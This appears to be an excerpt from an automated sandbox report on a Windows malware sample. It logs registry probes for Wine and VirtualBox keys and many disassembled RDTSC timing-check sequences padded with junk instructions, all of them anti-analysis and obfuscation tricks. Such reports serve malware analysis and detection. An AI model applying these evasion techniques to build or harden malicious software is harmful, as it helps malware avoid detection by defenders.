Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6142F7 second address: 613B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 clc 0x0000000a push dword ptr [ebp+122D0FF5h] 0x00000010 mov dword ptr [ebp+122D31C9h], ecx 0x00000016 jnp 00007F4D44D0519Ch 0x0000001c call dword ptr [ebp+122D23D5h] 0x00000022 pushad 0x00000023 clc 0x00000024 xor eax, eax 0x00000026 jmp 00007F4D44D051A2h 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f stc 0x00000030 mov dword ptr [ebp+122D3A39h], eax 0x00000036 mov dword ptr [ebp+122D23D0h], ebx 0x0000003c mov esi, 0000003Ch 0x00000041 mov dword ptr [ebp+122D2382h], edx 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b sub dword ptr [ebp+122D23D0h], ecx 0x00000051 mov dword ptr [ebp+122D2577h], ecx 0x00000057 lodsw 0x00000059 clc 0x0000005a add eax, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D24D9h], edi 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 mov dword ptr [ebp+122D24F2h], ecx 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 jne 00007F4D44D0519Ch 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 613B70 second address: 613B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007F4D45034D18h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F4D45034D16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E69 second address: 794E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E6D second address: 794E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D45034D27h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E8E second address: 794E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E92 second address: 794EAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D45034D1Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794EAC second address: 794ED6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F4D44D05196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F4D44D051AEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E2A second address: 793E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E32 second address: 793E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F4D44D0519Eh 0x0000000d jo 00007F4D44D05196h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 jnp 00007F4D44D05196h 0x0000001c jmp 00007F4D44D051A5h 0x00000021 jl 00007F4D44D05196h 0x00000027 popad 0x00000028 popad 0x00000029 push edx 0x0000002a push ecx 0x0000002b jnp 00007F4D44D05196h 0x00000031 jmp 00007F4D44D051A4h 0x00000036 pop ecx 0x00000037 pushad 0x00000038 push edx 0x00000039 pop edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794196 second address: 7941A0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794487 second address: 79448B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79448B second address: 79448F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79448F second address: 7944EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D44D051A9h 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F4D44D0519Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 jl 00007F4D44D0519Eh 0x0000001e jo 00007F4D44D05196h 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4D44D051A4h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7944EA second address: 7944EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798353 second address: 7983B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F4D44D05196h 0x00000014 popad 0x00000015 jmp 00007F4D44D051A0h 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F4D44D051A8h 0x00000024 mov eax, dword ptr [eax] 0x00000026 js 00007F4D44D051A2h 0x0000002c jng 00007F4D44D0519Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7983B4 second address: 798416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 jmp 00007F4D45034D28h 0x0000000d pop eax 0x0000000e jmp 00007F4D45034D1Dh 0x00000013 push 00000003h 0x00000015 push esi 0x00000016 sub dword ptr [ebp+124515D6h], eax 0x0000001c pop ecx 0x0000001d push 00000000h 0x0000001f sub esi, dword ptr [ebp+122D3789h] 0x00000025 push 00000003h 0x00000027 mov edx, dword ptr [ebp+122D3891h] 0x0000002d call 00007F4D45034D19h 0x00000032 push esi 0x00000033 je 00007F4D45034D18h 0x00000039 push edx 0x0000003a pop edx 0x0000003b pop esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798416 second address: 798429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798429 second address: 798433 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798433 second address: 798447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F4D44D05196h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798447 second address: 79844D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79844D second address: 798473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4D44D051A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798473 second address: 7984CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jnc 00007F4D45034D20h 0x00000014 pop eax 0x00000015 movzx edi, si 0x00000018 lea ebx, dword ptr [ebp+124581E0h] 0x0000001e jmp 00007F4D45034D23h 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F4D45034D21h 0x0000002c push edx 0x0000002d pop edx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7984CD second address: 7984E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D44D05198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4D44D0519Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798587 second address: 79858B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79858B second address: 7985EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ecx, dword ptr [ebp+122D3779h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F4D44D05198h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D38CDh] 0x00000032 call 00007F4D44D05199h 0x00000037 pushad 0x00000038 push eax 0x00000039 push esi 0x0000003a pop esi 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4D44D051A4h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79877A second address: 798781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798781 second address: 798801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F4D44D051A5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F4D44D05198h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D2577h], eax 0x0000002f push 00000000h 0x00000031 pushad 0x00000032 sub ch, FFFFFFECh 0x00000035 add dword ptr [ebp+122D2382h], ecx 0x0000003b popad 0x0000003c sbb ecx, 5DF3F557h 0x00000042 push 5592A39Ah 0x00000047 pushad 0x00000048 js 00007F4D44D0519Ch 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F4D44D051A6h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798801 second address: 79889C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 5592A31Ah 0x00000012 jns 00007F4D45034D27h 0x00000018 push 00000003h 0x0000001a push eax 0x0000001b add dword ptr [ebp+122D1CF5h], edi 0x00000021 pop esi 0x00000022 push 00000000h 0x00000024 jg 00007F4D45034D1Ch 0x0000002a push 00000003h 0x0000002c push eax 0x0000002d xor dword ptr [ebp+122D3025h], edx 0x00000033 pop edi 0x00000034 call 00007F4D45034D19h 0x00000039 push ebx 0x0000003a ja 00007F4D45034D18h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 pushad 0x00000043 jl 00007F4D45034D18h 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b jo 00007F4D45034D18h 0x00000051 pushad 0x00000052 popad 0x00000053 popad 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 jnl 00007F4D45034D2Fh 0x0000005e mov eax, dword ptr [eax] 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79889C second address: 7988A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7988A1 second address: 7988A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7988A7 second address: 7988D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 sub dword ptr [ebp+122D2577h], edi 0x00000019 lea ebx, dword ptr [ebp+124581F4h] 0x0000001f mov esi, dword ptr [ebp+122D3785h] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7988D3 second address: 7988E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8963 second address: 7B8969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8969 second address: 7B8974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6806 second address: 7B6810 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4D44D051B3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B693F second address: 7B6945 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6945 second address: 7B695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F4D44D05196h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B695B second address: 7B695F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B695F second address: 7B697B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F4D44D0519Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6F3A second address: 7B6F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6F3E second address: 7B6F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F4D44D05196h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B70B1 second address: 7B70B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C35C second address: 78C396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4D44D05196h 0x0000000a pop edi 0x0000000b push esi 0x0000000c jmp 00007F4D44D051A4h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4D44D051A6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B77F4 second address: 7B7816 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4D45034D1Bh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B7816 second address: 7B7826 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4D44D05196h 0x00000008 ja 00007F4D44D05196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DF1A second address: 78DF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B7AF9 second address: 7B7AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B821A second address: 7B823A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D20h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c js 00007F4D45034D2Ah 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B823A second address: 7B8244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8515 second address: 7B851F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87B5 second address: 7B87C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F4D44D05196h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87C7 second address: 7B87ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D27h 0x00000009 jmp 00007F4D45034D1Ah 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9F72 second address: 7B9F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9F77 second address: 7B9FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jns 00007F4D45034D16h 0x0000000e jng 00007F4D45034D16h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jng 00007F4D45034D29h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F4D45034D21h 0x00000027 pushad 0x00000028 jnp 00007F4D45034D16h 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BD578 second address: 7BD57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDAB7 second address: 7BDABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE64 second address: 7BDE69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE69 second address: 7BDE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE6F second address: 7BDE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F4D44D051A8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE81 second address: 7BDE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE85 second address: 7BDE89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0278 second address: 7C0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C775C second address: 7C7776 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4D44D0519Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F4D44D05196h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C7776 second address: 7C7796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F4D45034D1Eh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C7796 second address: 7C779B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C78FB second address: 7C78FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C84A8 second address: 7C84AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C867A second address: 7C867E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C867E second address: 7C8691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C8764 second address: 7C878F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4D45034D2Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4D45034D16h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9021 second address: 7C9044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F4D44D0519Ch 0x00000011 jnl 00007F4D44D05196h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C9044 second address: 7C9048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
